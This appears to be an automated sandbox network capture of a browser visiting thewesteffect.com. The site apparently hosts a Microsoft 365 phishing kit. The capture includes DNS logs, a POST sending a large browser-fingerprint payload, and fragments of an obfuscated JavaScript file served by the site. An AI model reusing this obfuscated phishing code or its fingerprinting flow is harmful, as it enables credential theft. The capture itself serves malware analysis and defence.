                                          Nov 18, 2024 23:43:56.234956980 CET1.1.1.1192.168.2.40x892fNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                          Nov 18, 2024 23:43:56.236394882 CET1.1.1.1192.168.2.40xd221No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                          Nov 18, 2024 23:43:56.236394882 CET1.1.1.1192.168.2.40xd221No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                          Nov 18, 2024 23:43:56.236675978 CET1.1.1.1192.168.2.40x8d5bNo error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                          Nov 18, 2024 23:43:56.236675978 CET1.1.1.1192.168.2.40x8d5bNo error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                          Nov 18, 2024 23:43:56.236675978 CET1.1.1.1192.168.2.40x8d5bNo error (0)sni1gl.wpc.omegacdn.net152.199.21.175A (IP address)IN (0x0001)false
                                          Nov 18, 2024 23:43:56.237966061 CET1.1.1.1192.168.2.40x993eNo error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                          Nov 18, 2024 23:43:56.237966061 CET1.1.1.1192.168.2.40x993eNo error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                          Nov 18, 2024 23:43:57.131711006 CET1.1.1.1192.168.2.40x933No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                          Nov 18, 2024 23:43:57.131711006 CET1.1.1.1192.168.2.40x933No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                          Nov 18, 2024 23:43:57.163199902 CET1.1.1.1192.168.2.40x61eeNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                          Nov 18, 2024 23:43:57.163199902 CET1.1.1.1192.168.2.40x61eeNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                          Nov 18, 2024 23:43:57.518260956 CET1.1.1.1192.168.2.40x529eNo error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                          Nov 18, 2024 23:43:57.518260956 CET1.1.1.1192.168.2.40x529eNo error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                          Nov 18, 2024 23:43:57.518260956 CET1.1.1.1192.168.2.40x529eNo error (0)sni1gl.wpc.omegacdn.net152.199.21.175A (IP address)IN (0x0001)false
                                          Nov 18, 2024 23:43:57.518533945 CET1.1.1.1192.168.2.40x131cNo error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                          Nov 18, 2024 23:43:57.518533945 CET1.1.1.1192.168.2.40x131cNo error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                          • thewesteffect.com
                                          • https:
                                            • cdn.socket.io
                                            • aadcdn.msauth.net
                                            • logincdn.msauth.net
                                            • www.w3schools.com
                                            • aadcdn.msftauth.net
                                          • fs.microsoft.com
                                          • slscr.update.microsoft.com
                                          • otelrules.azureedge.net
                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.2.449735192.254.232.1334435088C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:43:53 UTC741OUTGET /n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZrdFZSM009JnVpZD1VU0VSMTMxMTIwMjRVNDIxMTEzMDU=N0123N HTTP/1.1
                                          Host: thewesteffect.com
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          sec-ch-ua-platform: "Windows"
                                          Upgrade-Insecure-Requests: 1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: navigate
                                          Sec-Fetch-User: ?1
                                          Sec-Fetch-Dest: document
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2024-11-18 22:43:53 UTC208INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:43:53 GMT
                                          Server: Apache
                                          Upgrade: h2,h2c
                                          Connection: Upgrade, close
                                          Vary: Accept-Encoding
                                          Transfer-Encoding: chunked
                                          Content-Type: text/html; charset=UTF-8
                                          2024-11-18 22:43:53 UTC4726INData Raw: 31 32 36 39 0d 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 6e 6f 73 63 72 69 70 74 3e 59 6f 75 20 6e 65 65 64 20 74 6f 20 65 6e 61 62 6c 65 20 4a 61 76 61 53 63 72 69 70 74 20 74 6f 20 72 75 6e 20 74 68 69 73 20 61 70 70 2e 3c 2f 6e 6f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 72 6f
                                          Data Ascii: 1269<!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> </head> <body> <noscript>You need to enable JavaScript to run this app.</noscript> <div id="ro


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          1192.168.2.449736192.254.232.1334435088C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:43:53 UTC981OUTPOST /n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZrdFZSM009JnVpZD1VU0VSMTMxMTIwMjRVNDIxMTEzMDU=N0123N HTTP/1.1
                                          Host: thewesteffect.com
                                          Connection: keep-alive
                                          Content-Length: 139036
                                          Cache-Control: max-age=0
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          sec-ch-ua-platform: "Windows"
                                          Upgrade-Insecure-Requests: 1
                                          Origin: https://thewesteffect.com
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Sec-Fetch-Site: same-origin
                                          Sec-Fetch-Mode: navigate
                                          Sec-Fetch-Dest: document
                                          Referer: https://thewesteffect.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZrdFZSM009JnVpZD1VU0VSMTMxMTIwMjRVNDIxMTEzMDU=N0123N
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2024-11-18 22:43:53 UTC16384OUTData Raw: 64 61 74 61 3d 25 37 42 25 32 32 73 63 72 65 65 6e 25 32 32 25 33 41 25 37 42 25 32 32 61 76 61 69 6c 57 69 64 74 68 25 32 32 25 33 41 31 32 38 30 25 32 43 25 32 32 61 76 61 69 6c 48 65 69 67 68 74 25 32 32 25 33 41 39 38 34 25 32 43 25 32 32 77 69 64 74 68 25 32 32 25 33 41 31 32 38 30 25 32 43 25 32 32 68 65 69 67 68 74 25 32 32 25 33 41 31 30 32 34 25 32 43 25 32 32 63 6f 6c 6f 72 44 65 70 74 68 25 32 32 25 33 41 32 34 25 32 43 25 32 32 70 69 78 65 6c 44 65 70 74 68 25 32 32 25 33 41 32 34 25 32 43 25 32 32 61 76 61 69 6c 4c 65 66 74 25 32 32 25 33 41 30 25 32 43 25 32 32 61 76 61 69 6c 54 6f 70 25 32 32 25 33 41 30 25 32 43 25 32 32 6f 72 69 65 6e 74 61 74 69 6f 6e 25 32 32 25 33 41 25 32 32 25 35 42 6f 62 6a 65 63 74 2b 53 63 72 65 65 6e 4f 72 69 65
                                          Data Ascii: data=%7B%22screen%22%3A%7B%22availWidth%22%3A1280%2C%22availHeight%22%3A984%2C%22width%22%3A1280%2C%22height%22%3A1024%2C%22colorDepth%22%3A24%2C%22pixelDepth%22%3A24%2C%22availLeft%22%3A0%2C%22availTop%22%3A0%2C%22orientation%22%3A%22%5Bobject+ScreenOrie
                                          2024-11-18 22:43:53 UTC16384OUTData Raw: 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 58 4d 4c 44 6f 63 75 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 57 72 69 74 61 62 6c 65 53 74 72 65 61 6d 44 65 66 61 75 6c 74 57 72 69 74 65 72 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 57 72 69 74 61 62 6c 65 53 74 72 65 61 6d 44 65 66 61 75 6c 74 57 72 69 74 65 72 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 57 72 69 74 61 62 6c 65 53 74 72 65 61 6d 44 65 66 61 75 6c 74 43 6f 6e 74 72 6f 6c 6c 65 72 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 57 72 69 74 61 62 6c 65 53 74 72 65 61 6d 44 65 66 61 75 6c 74
                                          Data Ascii: nt%22%3A%22function+XMLDocument%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22WritableStreamDefaultWriter%22%3A%22function+WritableStreamDefaultWriter%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22WritableStreamDefaultController%22%3A%22function+WritableStreamDefault
                                          2024-11-18 22:43:53 UTC16384OUTData Raw: 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 53 56 47 41 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 52 65 73 70 6f 6e 73 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 52 65 73 70 6f 6e 73 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 52 65 73 69 7a 65 4f 62 73 65 72 76 65 72 53 69 7a 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 52 65 73 69 7a 65 4f 62 73 65 72 76 65 72 53 69 7a 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 52 65 73 69 7a 65 4f 62 73 65 72 76 65 72 45
                                          Data Ascii: %22%3A%22function+SVGAElement%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22Response%22%3A%22function+Response%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22ResizeObserverSize%22%3A%22function+ResizeObserverSize%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22ResizeObserverE
                                          2024-11-18 22:43:53 UTC16384OUTData Raw: 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 48 54 4d 4c 4d 65 6e 75 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 48 54 4d 4c 4d 65 64 69 61 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 48 54 4d 4c 4d 65 64 69 61 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 48 54 4d 4c 4d 61 72 71 75 65 65 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 48 54 4d 4c 4d 61 72 71 75 65 65 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32
                                          Data Ascii: nt%22%3A%22function+HTMLMenuElement%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22HTMLMediaElement%22%3A%22function+HTMLMediaElement%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22HTMLMarqueeElement%22%3A%22function+HTMLMarqueeElement%28%29+%7B+%5Bnative+code%5D+%7D%2
                                          2024-11-18 22:43:53 UTC16384OUTData Raw: 41 62 6f 72 74 53 69 67 6e 61 6c 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 41 62 6f 72 74 43 6f 6e 74 72 6f 6c 6c 65 72 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 41 62 6f 72 74 43 6f 6e 74 72 6f 6c 6c 65 72 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 6f 66 66 73 63 72 65 65 6e 42 75 66 66 65 72 69 6e 67 25 32 32 25 33 41 74 72 75 65 25 32 43 25 32 32 57 65 62 41 73 73 65 6d 62 6c 79 25 32 32 25 33 41 25 32 32 25 35 42 6f 62 6a 65 63 74 2b 57 65 62 41 73 73 65 6d 62 6c 79 25 35 44 25 32 32 25 32 43 25 32 32 41 62 73 6f 6c 75 74 65 4f 72 69 65 6e 74 61 74 69 6f 6e 53 65 6e 73 6f 72 25 32
                                          Data Ascii: AbortSignal%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22AbortController%22%3A%22function+AbortController%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22offscreenBuffering%22%3Atrue%2C%22WebAssembly%22%3A%22%5Bobject+WebAssembly%5D%22%2C%22AbsoluteOrientationSensor%2
                                          2024-11-18 22:43:53 UTC16384OUTData Raw: 73 4f 75 74 54 72 61 6e 73 66 65 72 50 61 63 6b 65 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 55 53 42 49 73 6f 63 68 72 6f 6e 6f 75 73 4f 75 74 54 72 61 6e 73 66 65 72 52 65 73 75 6c 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 55 53 42 49 73 6f 63 68 72 6f 6e 6f 75 73 4f 75 74 54 72 61 6e 73 66 65 72 52 65 73 75 6c 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 55 53 42 4f 75 74 54 72 61 6e 73 66 65 72 52 65 73 75 6c 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 55 53 42 4f 75 74 54 72 61 6e 73 66 65 72 52 65 73 75 6c 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74
                                          Data Ascii: sOutTransferPacket%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22USBIsochronousOutTransferResult%22%3A%22function+USBIsochronousOutTransferResult%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22USBOutTransferResult%22%3A%22function+USBOutTransferResult%28%29+%7B+%5Bnat
                                          2024-11-18 22:43:53 UTC16384OUTData Raw: 32 32 4d 65 64 69 61 53 74 72 65 61 6d 41 75 64 69 6f 44 65 73 74 69 6e 61 74 69 6f 6e 4e 6f 64 65 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 53 74 72 65 61 6d 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 53 6f 75 72 63 65 48 61 6e 64 6c 65 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 53 6f 75 72 63 65 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 52 65 63 6f 72 64 65 72 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 51 75 65 72 79 4c 69 73 74 45 76 65 6e 74 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 51 75 65 72 79 4c 69 73 74 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 4c 69 73 74 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 45 72 72 6f 72 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 45 6e 63 72 79 70 74 65 64 45 76 65 6e 74 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 45 6c 65 6d
                                          Data Ascii: 22MediaStreamAudioDestinationNode%22%2C%22MediaStream%22%2C%22MediaSourceHandle%22%2C%22MediaSource%22%2C%22MediaRecorder%22%2C%22MediaQueryListEvent%22%2C%22MediaQueryList%22%2C%22MediaList%22%2C%22MediaError%22%2C%22MediaEncryptedEvent%22%2C%22MediaElem
                                          2024-11-18 22:43:53 UTC16384OUTData Raw: 74 79 61 75 74 6f 73 74 61 74 65 63 68 61 6e 67 65 25 32 32 25 32 43 25 32 32 6f 6e 73 63 72 6f 6c 6c 65 6e 64 25 32 32 25 32 43 25 32 32 41 6e 69 6d 61 74 69 6f 6e 50 6c 61 79 62 61 63 6b 45 76 65 6e 74 25 32 32 25 32 43 25 32 32 41 6e 69 6d 61 74 69 6f 6e 54 69 6d 65 6c 69 6e 65 25 32 32 25 32 43 25 32 32 43 53 53 41 6e 69 6d 61 74 69 6f 6e 25 32 32 25 32 43 25 32 32 43 53 53 54 72 61 6e 73 69 74 69 6f 6e 25 32 32 25 32 43 25 32 32 44 6f 63 75 6d 65 6e 74 54 69 6d 65 6c 69 6e 65 25 32 32 25 32 43 25 32 32 42 61 63 6b 67 72 6f 75 6e 64 46 65 74 63 68 4d 61 6e 61 67 65 72 25 32 32 25 32 43 25 32 32 42 61 63 6b 67 72 6f 75 6e 64 46 65 74 63 68 52 65 63 6f 72 64 25 32 32 25 32 43 25 32 32 42 61 63 6b 67 72 6f 75 6e 64 46 65 74 63 68 52 65 67 69 73 74 72 61
                                          Data Ascii: tyautostatechange%22%2C%22onscrollend%22%2C%22AnimationPlaybackEvent%22%2C%22AnimationTimeline%22%2C%22CSSAnimation%22%2C%22CSSTransition%22%2C%22DocumentTimeline%22%2C%22BackgroundFetchManager%22%2C%22BackgroundFetchRecord%22%2C%22BackgroundFetchRegistra
                                          2024-11-18 22:43:53 UTC7964OUTData Raw: 32 32 63 72 65 61 74 65 43 6f 6d 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 63 72 65 61 74 65 43 6f 6d 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 63 72 65 61 74 65 44 6f 63 75 6d 65 6e 74 46 72 61 67 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 63 72 65 61 74 65 44 6f 63 75 6d 65 6e 74 46 72 61 67 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b
                                          Data Ascii: 22createComment%22%3A%22function+createComment%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22createDocumentFragment%22%3A%22function+createDocumentFragment%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22createElement%22%3A%22function+createElement%28%29+%7B+%5Bnative+
                                          2024-11-18 22:43:54 UTC208INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:43:53 GMT
                                          Server: Apache
                                          Upgrade: h2,h2c
                                          Connection: Upgrade, close
                                          Vary: Accept-Encoding
                                          Transfer-Encoding: chunked
                                          Content-Type: text/html; charset=UTF-8
                                          2024-11-18 22:43:54 UTC378INData Raw: 31 36 65 0d 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 69 64 3d 27 68 74 6d 6c 27 20 73 74 69 3d 27 56 6c 5a 4f 52 6c 56 71 52 58 70 4e 56 45 56 35 54 55 52 4a 4d 46 5a 55 55 58 6c 4e 56 45 56 34 54 58 70 42 4d 51 3d 3d 27 20 76 69 63 3d 27 27 20 6c 61 6e 67 3d 27 65 6e 27 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 6f 63 6b 65 74 2e 69 6f 2f 34 2e 37 2e 35 2f 73 6f 63 6b 65 74 2e 69 6f 2e 6d 69 6e 2e 6a 73 27 20 69 6e 74 65 67 72 69 74 79 3d 27 73 68 61 33 38 34 2d 32 68 75 61 5a 76 4f 52 39 69 44 7a 48 71 73 6c 71 77 70 52 38 37 69 73 45 6d 72 66 78 71 79 57 4f 46 37 68 72 37 42 59 36 4b 47 30 2b 68 56 4b 4c 6f 45 58 4d 50 55 4a 77 33 79 6e 57 75 68
                                          Data Ascii: 16e<!DOCTYPE html><html id='html' sti='VlZORlVqRXpNVEV5TURJMFZUUXlNVEV4TXpBMQ==' vic='' lang='en'><head> <script src='https://cdn.socket.io/4.7.5/socket.io.min.js' integrity='sha384-2huaZvOR9iDzHqslqwpR87isEmrfxqyWOF7hr7BY6KG0+hVKLoEXMPUJw3ynWuh


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          2192.168.2.449739192.254.232.1334435088C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:43:54 UTC610OUTGET /n/jsnom.js HTTP/1.1
                                          Host: thewesteffect.com
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: */*
                                          Sec-Fetch-Site: same-origin
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: script
                                          Referer: https://thewesteffect.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZrdFZSM009JnVpZD1VU0VSMTMxMTIwMjRVNDIxMTEzMDU=N0123N
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2024-11-18 22:43:54 UTC263INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:43:54 GMT
                                          Server: Apache
                                          Upgrade: h2,h2c
                                          Connection: Upgrade, close
                                          Last-Modified: Mon, 11 Nov 2024 07:43:41 GMT
                                          Accept-Ranges: bytes
                                          Content-Length: 100217
                                          Vary: Accept-Encoding
                                          Content-Type: text/javascript
                                          2024-11-18 22:43:54 UTC7929INData Raw: 66 75 6e 63 74 69 6f 6e 20 5f 30 78 31 66 61 65 28 5f 30 78 33 34 62 61 31 39 2c 20 5f 30 78 35 39 38 62 31 38 29 20 7b 20 63 6f 6e 73 74 20 5f 30 78 35 39 65 62 30 35 20 3d 20 5f 30 78 35 39 65 62 28 29 3b 20 72 65 74 75 72 6e 20 5f 30 78 31 66 61 65 20 3d 20 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 66 61 65 35 39 2c 20 5f 30 78 33 39 31 66 64 35 29 20 7b 20 5f 30 78 31 66 61 65 35 39 20 3d 20 5f 30 78 31 66 61 65 35 39 20 2d 20 30 78 65 61 3b 20 6c 65 74 20 5f 30 78 63 62 63 31 36 39 20 3d 20 5f 30 78 35 39 65 62 30 35 5b 5f 30 78 31 66 61 65 35 39 5d 3b 20 72 65 74 75 72 6e 20 5f 30 78 63 62 63 31 36 39 3b 20 7d 2c 20 5f 30 78 31 66 61 65 28 5f 30 78 33 34 62 61 31 39 2c 20 5f 30 78 35 39 38 62 31 38 29 3b 20 7d 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33
                                          Data Ascii: function _0x1fae(_0x34ba19, _0x598b18) { const _0x59eb05 = _0x59eb(); return _0x1fae = function(_0x1fae59, _0x391fd5) { _0x1fae59 = _0x1fae59 - 0xea; let _0xcbc169 = _0x59eb05[_0x1fae59]; return _0xcbc169; }, _0x1fae(_0x34ba19, _0x598b18); }(function(_0x3
                                          2024-11-18 22:43:54 UTC8000INData Raw: 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 5c 78 32 30 61 75 74 6f 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 5c 78 32 30 61 75 74 6f 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 68 65 69 67 68 74 3a 5c 78 32 30 61 75 74 6f 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6d 61 72 67 69 6e 2d 74 6f 70 3a 5c 78 32 30 30 25 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6d 61 78 2d 77 69 64 74 68 3a 5c 78 32 30 31 30
                                          Data Ascii: 20\x20\x20\x20\x20margin-left:\x20auto;\x0a\x20\x20\x20\x20\x20\x20\x20\x20margin-right:\x20auto;\x0a\x20\x20\x20\x20\x20\x20\x20\x20height:\x20auto;\x0a\x20\x20\x20\x20\x20\x20\x20\x20margin-top:\x200%;\x0a\x20\x20\x20\x20\x20\x20\x20\x20max-width:\x2010
                                          2024-11-18 22:43:54 UTC8000INData Raw: 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 77 6f 72 64 2d 73 70 61 63 69 6e 67 3a 5c 78 32 30 6e 6f 72 6d 61 6c 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 61 70 70 65 61 72 61 6e 63 65 3a 5c 78 32 30 74 65 78 74 66 69 65 6c 64 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 5c 78 32 30 2d 69 6e 74 65 72 6e 61 6c 2d 6c 69 67 68 74 2d 64 61 72 6b 28 72 67 62 28 32 35 35 2c 5c 78 32 30 32 35 35 2c 5c 78 32 30 32 35 35 29 2c 5c 78 32 30 72 67 62 28 35 39 2c 5c 78 32 30 35 39 2c 5c 78 32 30 35 39 29 29 3b 5c 78 30 61 5c 78 32 30 5c 78
                                          Data Ascii: 20\x20\x20\x20\x20\x20\x20\x20word-spacing:\x20normal;\x0a\x20\x20\x20\x20\x20\x20\x20\x20appearance:\x20textfield;\x0a\x20\x20\x20\x20\x20\x20\x20\x20background-color:\x20-internal-light-dark(rgb(255,\x20255,\x20255),\x20rgb(59,\x2059,\x2059));\x0a\x20\x
